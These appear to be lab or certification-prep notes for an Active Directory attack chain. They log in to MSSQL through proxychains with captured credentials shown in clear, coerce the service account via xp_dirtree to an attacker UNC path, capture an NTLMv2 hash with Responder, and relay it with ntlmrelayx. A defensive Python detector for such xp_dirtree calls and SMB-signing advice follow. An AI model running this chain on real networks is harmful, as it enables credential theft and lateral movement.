Found that the captured credentials will/fdsfssdfDFG4 can log in to the MSSQL instance on host 151 (full IP not recorded in these notes; `<host 151>` below is a placeholder):

```shell
proxychains4 impacket-mssqlclient 'will:fdsfssdfDFG4@<host 151>' -port 1433 -windows-auth
```

Authentication has to use **-windows-auth**, otherwise the login fails.
Look for linked servers:

```sql
SQL> select srvname from sysservers;
```

Check which user we are logged in as:

```sql
SQL> select system_user;
```
Clearly the current login does not have sysadmin privileges. Refer to the attack method on P580: start Responder on the VPN interface, then make the SQL Server service account authenticate to it by pointing xp_dirtree at a UNC path.

```shell
responder -I tun0
```

```sql
SQL> EXECUTE('master..xp_dirtree "\\\\192.168.49.64\\a"');
```
The Responder terminal shows the following (hash truncated in these notes):

```
[SMB] NTLMv2-SSP Client : ::ffff:192.168.64.159
[SMB] NTLMv2-SSP Username : TRICKY\sqlsvc
[SMB] NTLMv2-SSP Hash : sqlsvc::TRICKY:80e42d2692c2d0d...
```
The password does not seem to crack, so switch approach: instead of cracking, relay the authentication. Refer to P584.

```shell
proxychains4 impacket-ntlmrelayx --no-http-server -smb2support -t smb://172.16.64.152
```
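From the defender's side, the step that makes the whole chain work is a low-privileged login calling xp_dirtree with a UNC path, which sends the sqlsvc service account's NTLM authentication off the box. The following detection logic is an added example, not part of these notes or of any tool mentioned here; it assumes a constructed audit-line format (`<ts> login=<x> statement=<sql>`) and an assumed allowlist of file servers, and flags file-related extended procedures whose UNC host is not on that list.

```python
import re
from typing import Dict, List, Optional

# Extended stored procedures that make the SQL Server *service account* open a
# path; with a UNC argument they trigger an outbound SMB/NTLM authentication.
FILE_XPS = {"xp_dirtree", "xp_fileexist", "xp_subdirs", "xp_getfiledetails"}

# File servers the SQL service is expected to reach over SMB (assumed values).
APPROVED_SMB_HOSTS = {"fileserver01.tricky.local", "10.10.10.5"}

# xp name, optional quote, 2-4 backslashes (the doubled form survives EXECUTE()),
# then the host portion of the UNC path.
UNC_CALL = re.compile(
    r"(?P<xp>xp_\w+)\s*[\"']?\\{2,4}(?P<host>[A-Za-z0-9._-]+)", re.IGNORECASE
)

def analyze_statement(stmt: str) -> Optional[Dict[str, str]]:
    """Return a finding when a file xp is called with a UNC host, else None."""
    m = UNC_CALL.search(stmt)
    if not m or m.group("xp").lower() not in FILE_XPS:
        return None
    host = m.group("host")
    # Any unapproved host is high: the credential leaving the box is sqlsvc's,
    # regardless of how weak the login that issued the statement is.
    severity = "low" if host.lower() in APPROVED_SMB_HOSTS else "high"
    return {"xp": m.group("xp").lower(), "host": host, "severity": severity}

def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Scan constructed audit lines of the form '<ts> login=<x> statement=<sql>'."""
    findings = []
    for line in lines:
        head, sep, stmt = line.partition(" statement=")
        if not sep:
            continue
        login = head.split("login=", 1)[1].split()[0] if "login=" in head else "?"
        f = analyze_statement(stmt)
        if f:
            f["login"] = login
            findings.append(f)
    return findings

# Constructed sample lines (not real telemetry); the middle one mirrors the notes.
SAMPLE_LOG = [
    r"""2024-05-01T10:00:01Z login=will statement=select srvname from sysservers;""",
    r"""2024-05-01T10:00:09Z login=will statement=EXECUTE('master..xp_dirtree "\\\\192.168.49.64\\a"');""",
    r"""2024-05-01T10:01:00Z login=backup_job statement=EXEC xp_fileexist '\\fileserver01.tricky.local\bk\x.bak';""",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Enabling SMB signing on the relay targets (here 172.16.64.152) removes the second half of the chain regardless of whether the coercion is caught.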